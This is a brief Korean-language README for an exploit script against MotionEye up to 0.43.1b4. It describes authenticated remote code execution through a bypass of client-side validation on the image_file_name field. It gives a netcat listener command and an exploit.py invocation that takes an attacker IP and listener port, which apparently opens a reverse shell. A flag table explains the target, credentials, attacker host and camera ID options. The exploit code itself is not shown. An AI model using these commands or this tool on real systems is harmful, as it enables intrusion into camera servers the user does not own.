
MotionEye <= 0.43.1b4에서 image_file_name 필드의 클라이언트 측 검증 우회를 통한 인증 RCE.
nc -lvnp 4444
python exploit.py -t http://127.0.0.1:8765 -p password -lh IP -lp 4444
| 플래그 | 설명 |
|---|---|
-t | 대상 호스트/URL (기본 포트 8765) |
-u | 사용자 이름 (기본값: admin) |
-p | 비밀번호 - GUI에 입력하는 값과 동일 / motion.conf에서 확인 가능 |
-lh | 공격자 IP |
-lp | 리스너 포트 |
--camera-id | 카메라 ID (생략 시 자동 감지) |